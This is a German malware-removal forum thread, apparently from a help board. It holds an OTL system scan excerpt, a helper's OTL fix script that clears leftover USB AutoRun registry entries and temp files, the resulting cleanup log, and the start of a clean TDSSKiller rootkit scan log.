"{CBD98854-92C9-441E-9713-43D8CA89334E}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 

"{CDEEC85A-3305-4435-995A-666F685CC843}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 

"{D1D6CE0B-D6BF-4DBE-9823-CE0D8F65068C}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 

"{D55642BE-5836-4CDB-8A16-0114F93FE5F2}" = protocol=17 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 

"{E810B54B-4B65-4C78-9139-824738374694}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 

"{EA478A72-42C6-49D7-95DB-358F57A8B512}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 

"{EE5C1F2B-44D5-4BAE-BF32-6245683AA23D}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 

"TCP Query User{54279280-8F23-4BA9-9E36-CE06ABB00513}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=6 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 

"TCP Query User{773BDB20-BBD6-46FE-B421-12DF0F9EF2F2}C:\xampp\apache\bin\httpd.exe" = protocol=6 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 

"TCP Query User{94CA6C52-5629-408C-BE9A-81068EA0156B}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 

"TCP Query User{BB32885D-2FF9-4630-9D00-C7DFD9FC3786}C:\windows\explorer.exe" = protocol=6 | dir=in | app=c:\windows\explorer.exe | 

"TCP Query User{BEC3CAC1-2AF8-4A1D-977E-2E1A997B2D01}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 

"UDP Query User{39A00ACD-5B35-4DDC-AECB-265D1DC4A269}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 

"UDP Query User{5D8CA6A2-4222-48D2-AB6F-0C8AC40F1D85}C:\xampp\apache\bin\httpd.exe" = protocol=17 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 

"UDP Query User{6DFB4226-425E-4206-A91E-9B0D975905E8}C:\windows\explorer.exe" = protocol=17 | dir=in | app=c:\windows\explorer.exe | 

"UDP Query User{84CBEA78-88A6-4423-8DF3-06BA1AACE776}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 

"UDP Query User{FE1B0B2D-DABC-4B72-9E1A-91993448416F}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=17 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 

 
 ========== HKEY_LOCAL_MACHINE Uninstall List ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{00010407-78E1-11D2-B60F-006097C998E7}" = Microsoft Office 2000 Professional

"{02E89EFC-7B07-4D5A-AA03-9EC0902914EE}" = VC 9.0 Runtime

"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu

"{1061DF04-CF33-40B0-8360-D07C9BBEB122}" = HP Wireless Assistant

"{18D10072035C4515918F7E37EAFAACFC}" = AutoUpdate

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{26A24AE4-039D-4CA4-87B4-2F83216035FF}" = Java(TM) 6 Update 35

"{26A24AE4-039D-4CA4-87B4-2F83217010FF}" = Java 7 Update 10

"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile

"{4286716B-1287-48E7-9078-3DC8248DBA96}" = OpenOffice.org 3.3

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM

"{6AD9F5F3-5BD0-4000-BD9C-B536CF86D988}" = iTunes

"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729

"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK

"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable

"{7426D8C8-7323-4A3D-9F94-2465B95C26B5}" = TVCenter

"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update

"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour

"{7B63B2922B174135AFC0E1377DD81EC2}" = DivX Codec

"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable

"{8F1ADE4D-EFAC-4F5A-B346-23C2687FAF50}" = Apple Mobile Device Support

"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17

"{AC76BA86-7AD7-1031-7B44-AA1000000001}" = Adobe Reader X (10.1.4) - Deutsch

"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime

"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Toolbars

"{C8FD5BC1-92EF-4C15-92A9-F9AC7F61985F}" = HP Update

"{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}" = HP Product Detection

"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1

"{D6F879CC-59D6-4D4B-AE9B-D761E48D25ED}" = Skype™ 5.3

"{D85FFE92-BF14-4E9B-BCCD-E5C16069E65F}_is1" = FireJump 1.0

"{DFAA3D2B-7087-464E-823B-738A23C29C27}" = Microsoft Visual J# 2.0 Redistributable Package - SE

"{F0A37341-D692-11D4-A984-009027EC0A9C}" = SoundMAX

"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219

"{F38ADCA4-AF7C-4C73-9021-6F1EA15D15EA}" = Pinnacle TVCenter Pro

"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support

"{F750C986-5310-3A5A-95F8-4EC71C8AC01C}" = Microsoft .NET Framework 4 Client Profile DEU Language Pack

"7-Zip" = 7-Zip 9.20

"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin

"Adobe Shockwave Player" = Adobe Shockwave Player 11.6

"Agere Systems Soft Modem" = Agere Systems HDA Modem

"Avira AntiVir Desktop" = Avira Free Antivirus

"BabylonToolbar" = Babylon toolbar 

"Broadcom 802.11 Wireless LAN Adapter" = Broadcom 802.11 Wireless LAN Adapter

"BurnAware Free_is1" = BurnAware Free 5.2

"Der_Deploy_0" = Der Kleine Turnierplaner 7.1.4.1

"FileZilla Client" = FileZilla Client 3.6.0.2

"HDMI" = Intel(R) Graphics Media Accelerator Driver

"Hotspot_Shield Toolbar" = Hotspot Shield Toolbar

"HotspotShield" = Hotspot Shield 2.75

"InfraRecorder" = InfraRecorder

"LM98Free 2.2a_is1" = LM98Free 2.2a

"LuPO_is1" = LuPO 1.0.2.45

"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware Version 1.70.0.1100

"Marvell Miniport Driver" = Marvell Miniport Driver

"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU

"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1

"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile

"Microsoft .NET Framework 4 Client Profile DEU Language Pack" = Microsoft .NET Framework 4 Client Profile DEU Language Pack

"Microsoft Visual J# 2.0 Redistributable Package - SE" = Microsoft Visual J# 2.0 Redistributable Package - SE

"Mozilla Firefox 18.0.2 (x86 de)" = Mozilla Firefox 18.0.2 (x86 de)

"Mozilla Thunderbird 17.0.2 (x86 de)" = Mozilla Thunderbird 17.0.2 (x86 de)

"MozillaMaintenanceService" = Mozilla Maintenance Service

"Mp3tag" = Mp3tag v2.49

"Notepad++" = Notepad++

"RocketDock_is1" = RocketDock 1.3.5

"Scribus 1.3.9" = Scribus 1.3.9

"SearchAnonymizer" = SearchAnonymizer

"SPG-Verein" = SPG-Verein

"SynTPDeinstKey" = Synaptics Pointing Device Driver

"TeamViewer 8" = TeamViewer 8

"Verbindungsassistent" = Verbindungsassistent

"VEREIN 2000" = 

"VLC media player" = VLC media player 1.1.10

"WinGimp-2.0_is1" = GIMP 2.6.11

"WinHTTrack Website Copier_is1" = WinHTTrack Website Copier 3.46-1

"XP Codec Pack" = XP Codec Pack

 
 ========== HKEY_CURRENT_USER Uninstall List ==========

 

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"CopyTrans Suite" = Nur Deinstallierung der CopyTrans Suite möglich.

 
 ========== Last 20 Event Log Errors ==========

 

[ Application Events ]

Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100

Description = Task Scheduling Error: m->NextScheduledEvent 2605

 

Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100

Description = Task Scheduling Error: m->NextScheduledSPRetry 2605

 

Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100

Description = Task Scheduling Error: Continuously busy for more than a second

 

Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100

Description = Task Scheduling Error: m->NextScheduledEvent 1326

 

Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100

Description = Task Scheduling Error: m->NextScheduledSPRetry 1326

 

Error - 29.01.2013 12:59:53 | Computer Name = TuS-PC | Source = Application Error | ID = 1000

Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,

 fehlerhaftes Modul ntdll.dll, Version 6.0.6002.18541, Zeitstempel 0x4ec3e3d5, Ausnahmecode

 0x80000003, Fehleroffset 0x0004878e,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.

 

Error - 29.01.2013 13:00:01 | Computer Name = TuS-PC | Source = Application Error | ID = 1000

Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,

 fehlerhaftes Modul iTunes.dll, Version 10.6.3.25, Zeitstempel 0x4fd1634f, Ausnahmecode

 0xc0000005, Fehleroffset 0x007b1a62,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.

 

Error - 29.01.2013 13:29:50 | Computer Name = TuS-PC | Source = Application Error | ID = 1000

Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,

 fehlerhaftes Modul JavaScriptCore.dll, Version 7536.27.1.1, Zeitstempel 0x506116fd,

 Ausnahmecode 0xc0000005, Fehleroffset 0x00116b2a,  Prozess-ID 0xf30, Anwendungsstartzeit

 01cdfe4215b9d7d0.

 

Error - 29.01.2013 13:30:42 | Computer Name = TuS-PC | Source = Application Hang | ID = 1002

Description = Programm iTunes.exe, Version 10.6.3.25 arbeitet nicht mehr mit Windows

 zusammen und wurde beendet. Überprüfen Sie den Problemverlauf im Applet "Lösungen

 für Probleme" in der Systemsteuerung, um nach weiteren Informationen über das Problem

 zu suchen.  Prozess-ID: f30  Anfangszeit: 01cdfe4215b9d7d0  Zeitpunkt der Beendigung:

 44

 

Error - 31.01.2013 19:03:24 | Computer Name = TuS-PC | Source = Windows Search Service | ID = 3013

Description = 

 

[ System Events ]

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155

Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.

 

Error - 13.02.2013 10:39:29 | Computer Name = TuS-PC | Source = volsnap | ID = 393230

Description = Die Schattenkopien von Volume "C:" wurden aufgrund eines E/A-Fehlers

 auf Volume "C:" abgebrochen.

 

Error - 13.02.2013 14:50:20 | Computer Name = TuS-PC | Source = DCOM | ID = 10010

Description = 

 

Error - 16.02.2013 16:22:22 | Computer Name = TuS-PC | Source = EventLog | ID = 6008

Description = Das System wurde zuvor am 16.02.2013 um 20:48:46 unerwartet heruntergefahren.

 

 

< End of report >

--- --- ---

hi,
otl fix

Fixen mit OTL

Starte bitte die OTL.exe.
Kopiere nun den Inhalt aus der Codebox in die Textbox.

Code:

:OTL

O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe

O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe

O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a

O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a

:files

:Commands

[emptytemp]

Solltest du deinen Benutzernamen z. B. durch "*****" unkenntlich gemacht haben, so füge an entsprechender Stelle deinen richtigen Benutzernamen ein. Andernfalls wird der Fix nicht funktionieren.
Schließe bitte nun alle Programme.
Klicke nun bitte auf den Fix Button.
OTL kann gegebenfalls einen Neustart verlangen. Bitte dies zulassen.
Nach dem Neustart findest Du ein Textdokument auf deinem Desktop.
( Auch zu finden unter C:\_OTL\MovedFiles\<Uhrzeit_Datum>.txt)
Kopiere nun den Inhalt hier in Deinen Thread

Erledigt, Inhalt der Datei siehe unten. Allerdings ist Avira nun deaktiviert!?

Zitat:

All processes killed
========== OTL ==========
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
========== FILES ==========
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: TuS
->Temp folder emptied: 31832 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 3695164 bytes
->Flash cache emptied: 492 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 0 bytes
RecycleBin emptied: 4980084 bytes

Total Files Cleaned = 8,00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 02192013_004642

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

Zitat:

Zitat von martinbu (Beitrag 1014930)

Erledigt, Inhalt der Datei siehe unten. Allerdings ist Avira nun deaktiviert!?

Bezüglich Avira hat sich die Sache erledigt, läuft nach einem erneuten Start nun wieder ganz normal.

Hi,
Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

Keine infizierten Dateien gefunden, die Logfile anbei.

Zitat:

14:26:10.0303 4252 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
14:26:10.0534 4252 ============================================================
14:26:10.0534 4252 Current date / time: 2013/02/19 14:26:10.0534
14:26:10.0534 4252 SystemInfo:
14:26:10.0534 4252
14:26:10.0534 4252 OS Version: 6.0.6002 ServicePack: 2.0
14:26:10.0534 4252 Product type: Workstation
14:26:10.0534 4252 ComputerName: TUS-PC
14:26:10.0535 4252 UserName: TuS
14:26:10.0535 4252 Windows directory: C:\Windows
14:26:10.0535 4252 System windows directory: C:\Windows
14:26:10.0535 4252 Processor architecture: Intel x86
14:26:10.0535 4252 Number of processors: 2
14:26:10.0535 4252 Page size: 0x1000
14:26:10.0535 4252 Boot type: Normal boot
14:26:10.0535 4252 ============================================================
14:26:12.0634 4252 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
14:26:12.0634 4252 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 ============================================================
14:26:12.0634 4252 \Device\Harddisk0\DR0:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
14:26:12.0634 4252 \Device\Harddisk1\DR1:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
14:26:12.0634 4252 \Device\Harddisk2\DR2:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
14:26:12.0634 4252 ============================================================
14:26:12.0665 4252 C: <-> \Device\Harddisk0\DR0\Partition1
14:26:12.0696 4252 D: <-> \Device\Harddisk0\DR0\Partition2
14:26:12.0821 4252 E: <-> \Device\Harddisk0\DR0\Partition3
14:26:12.0837 4252 G: <-> \Device\Harddisk2\DR2\Partition1
14:26:12.0837 4252 H: <-> \Device\Harddisk1\DR1\Partition1
14:26:12.0837 4252 ============================================================
14:26:12.0837 4252 Initialize success
14:26:12.0837 4252 ============================================================
14:26:33.0587 1440 ============================================================
14:26:33.0587 1440 Scan started
14:26:33.0587 1440 Mode: Manual;
14:26:33.0587 1440 ============================================================
14:26:34.0387 1440 ================ Scan system memory ========================
14:26:34.0387 1440 System memory - ok
14:26:34.0387 1440 ================ Scan services =============================
14:26:34.0617 1440 [ AEF9EE4451D5C46370142CB06D0F3591 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys
14:26:34.0647 1440 Accelerometer - ok
14:26:34.0667 1440 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
14:26:34.0677 1440 ACPI - ok
14:26:34.0707 1440 [ BF9DE454F80A1516D4D582520B2D6EDD ] ADIHdAudAddService C:\Windows\system32\drivers\ADIHdAud.sys
14:26:34.0717 1440 ADIHdAudAddService - ok
14:26:34.0817 1440 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
14:26:34.0817 1440 AdobeARMservice - ok
14:26:34.0887 1440 [ EC807244904FA170C299AB06D87FBDBE ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
14:26:34.0897 1440 AdobeFlashPlayerUpdateSvc - ok
14:26:34.0937 1440 [ 2EDC5BBAC6C651ECE337BDE8ED97C9FB ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
14:26:34.0953 1440 adp94xx - ok
14:26:34.0988 1440 [ B84088CA3CDCA97DA44A984C6CE1CCAD ] adpahci C:\Windows\system32\drivers\adpahci.sys
14:26:35.0019 1440 adpahci - ok
14:26:35.0046 1440 [ 7880C67BCCC27C86FD05AA2AFB5EA469 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
14:26:35.0075 1440 adpu160m - ok
14:26:35.0104 1440 [ 9AE713F8E30EFC2ABCCD84904333DF4D ] adpu320 C:\Windows\system32\drivers\adpu320.sys
14:26:35.0128 1440 adpu320 - ok
14:26:35.0173 1440 [ 30EB9BCF0D1E4EDD3905AE003AC0C1AC ] AEADIFilters C:\Windows\system32\AEADISRV.EXE
14:26:35.0174 1440 AEADIFilters - ok
14:26:35.0193 1440 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
14:26:35.0194 1440 AeLookupSvc - ok
14:26:35.0248 1440 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
14:26:35.0264 1440 AFD - ok
14:26:35.0299 1440 [ 9C9D3B7A05445B1AB2DF4D0C4D6B77E8 ] AgereModemAudio C:\Program Files\LSI SoftModem\agrsmsvc.exe
14:26:35.0300 1440 AgereModemAudio - ok
14:26:35.0347 1440 [ 3712986CC3ABF0DC656B43525B9D1279 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
14:26:35.0415 1440 AgereSoftModem - ok
14:26:35.0453 1440 [ EF23439CDD587F64C2C1B8825CEAD7D8 ] agp440 C:\Windows\system32\drivers\agp440.sys
14:26:35.0480 1440 agp440 - ok
14:26:35.0506 1440 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
14:26:35.0532 1440 aic78xx - ok
14:26:35.0553 1440 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
14:26:35.0576 1440 ALG - ok
14:26:35.0605 1440 [ 90395B64600EBB4552E26E178C94B2E4 ] aliide C:\Windows\system32\drivers\aliide.sys
14:26:35.0631 1440 aliide - ok
14:26:35.0653 1440 [ 2B13E304C9DFDFA5EB582F6A149FA2C7 ] amdagp C:\Windows\system32\drivers\amdagp.sys
14:26:35.0685 1440 amdagp - ok
14:26:35.0703 1440 [ 0577DF1D323FE75A739C787893D300EA ] amdide C:\Windows\system32\drivers\amdide.sys
14:26:35.0721 1440 amdide - ok
14:26:35.0755 1440 [ DC487885BCEF9F28EECE6FAC0E5DDFC5 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
14:26:35.0779 1440 AmdK7 - ok
14:26:35.0799 1440 [ 0CA0071DA4315B00FC1328CA86B425DA ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
14:26:35.0822 1440 AmdK8 - ok
14:26:35.0877 1440 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
14:26:35.0878 1440 AntiVirSchedulerService - ok
14:26:35.0912 1440 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
14:26:35.0913 1440 AntiVirService - ok
14:26:35.0952 1440 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
14:26:35.0954 1440 Appinfo - ok
14:26:36.0034 1440 [ F401929EE0CC92BFE7F15161CA535383 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
14:26:36.0036 1440 Apple Mobile Device - ok
14:26:36.0068 1440 [ 5F673180268BB1FDB69C99B6619FE379 ] arc C:\Windows\system32\drivers\arc.sys
14:26:36.0092 1440 arc - ok
14:26:36.0144 1440 [ 957F7540B5E7F602E44648C7DE5A1C05 ] arcsas C:\Windows\system32\drivers\arcsas.sys
14:26:36.0170 1440 arcsas - ok
14:26:36.0208 1440 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
14:26:36.0248 1440 AsyncMac - ok
14:26:36.0278 1440 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
14:26:36.0279 1440 atapi - ok
14:26:36.0313 1440 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
14:26:36.0318 1440 AudioEndpointBuilder - ok
14:26:36.0329 1440 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
14:26:36.0332 1440 Audiosrv - ok
14:26:36.0353 1440 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
14:26:36.0385 1440 avgntflt - ok
14:26:36.0422 1440 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
14:26:36.0451 1440 avipbb - ok
14:26:36.0479 1440 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
14:26:36.0502 1440 avkmgr - ok
14:26:36.0542 1440 [ 0A5E8178EFF1D8F109A95235AEB7D76F ] azvusb C:\Windows\system32\DRIVERS\azvusb.sys
14:26:36.0566 1440 azvusb - ok
